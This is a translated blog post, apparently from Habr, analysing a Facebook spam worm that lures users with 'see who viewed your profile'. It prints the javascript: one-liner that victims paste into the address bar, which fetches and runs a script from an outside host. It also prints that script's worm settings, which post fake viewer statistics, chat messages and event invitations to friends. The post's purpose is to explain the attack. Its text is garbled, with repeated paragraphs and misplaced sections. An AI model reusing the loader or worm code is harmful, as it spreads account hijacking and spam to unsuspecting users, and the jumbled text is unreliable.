New wave of spam on Facebook
Today on Facebook a wave of spam has started with the topic “How to see your profile !!”. Distributed in three ways:
The goal of all three ways is to drive the attacked user to http://iamnewc.blogspot.com/ , which is hidden behind the GoDaddy x.co url shortcut at http://x.co/WlL4/?$PARAM , where $ PARAM is a certain number, apparently associated with the user Facebook, to understand who pecked.
Further reminds of the social engineering method used in another recent sensational phishing attack on Facebook users: they offer to copy the JavaScript code to the clipboard, go to Facebook and execute it (by inserting it into the address bar and pressing Enter):
And from this page ( http://bbbindia4.in/jsp.php ), in turn, is loaded and executed:
Update The urls mentioned in the last fragment, abbreviated with x.co, no longer work; may have been removed by GoDaddy security. But on www.gameindiagame.blogspot.com you can go at least to admire the Facebook Verification Spam Bot :). Naturally, it is better to go in incognito mode.
- IM messages if the target user is online
- Tegging users in a post with statistics of viewing an infected user (of course, the statistics are fake, in the spirit of the infamous scams in the RuNet "Read someone else's sms" and "Look at the history of user movements"
- Event Invitation.
The goal of all three ways is to drive the attacked user to http://iamnewc.blogspot.com/ , which is hidden behind the GoDaddy x.co url shortcut at http://x.co/WlL4/?$PARAM , where $ PARAM is a certain number, apparently associated with the user Facebook, to understand who pecked.
Further reminds of the social engineering method used in another recent sensational phishing attack on Facebook users: they offer to copy the JavaScript code to the clipboard, go to Facebook and execute it (by inserting it into the address bar and pressing Enter):
javascript:(a=(b=document).createElement('script')).src='// bbbindia4.in/jsp.php',b.body.appendChild(a);void(0)
And from this page ( http://bbbindia4.in/jsp.php ), in turn, is loaded and executed:
var randomnumber=Math.floor(Math.random()*99999); var randomnumber1=Math.floor(Math.random()*987); var randomnumber2=Math.floor(Math.random()*754); var randomnumber3=Math.floor(Math.random()*43); var randomnumber4=Math.floor(Math.random()*9); var random=Math.floor(Math.random()*5); if (random == 1) { var url = ' x.co/WleP?' } else if (random == 2) { var url = 'http://x.co/WleV/?' } else if (random == 3) { var url = 'http://x.co/Wled/?' } else if (random == 4) { var url = 'http://x.co/Wlek/?' } else { var url = 'http://x.co/Wlem/?' } var message = '%firstname% See who views your profile '; var ev = 'check out this new facebook feature! \x0A see your profile view results by copying and pasting the link below in the address bar \x0A '; var test = 'My Top Profile Viewers Are:\x0A'; var id = '%tf% - ' + randomnumber1 + ' views,\x0A'; var id1 = '%tf% - ' + randomnumber2 + ' views,\x0A'; var id2 = '%tf% - ' + randomnumber3 + ' views,\x0A'; var id3 = '%tf% - ' + randomnumber4 + ' views,\x0A'; var post = ' see who viewed your facebook profile @ '; var postmessage = test + id + id1 + id2 + id3 + post + url + randomnumber; var chatmessage = message + url + randomnumber; var redirect = 'http:// www.gameindiagame.blogspot.com'; var eventdesc = ev + url + randomnumber; var eventname = 'How to see who viewed your profile!!'; var nfriends = 5000; //
Update The urls mentioned in the last fragment, abbreviated with x.co, no longer work; may have been removed by GoDaddy security. But on www.gameindiagame.blogspot.com you can go at least to admire the Facebook Verification Spam Bot :). Naturally, it is better to go in incognito mode.
')
Source: https://habr.com/ru/post/118031/
All Articles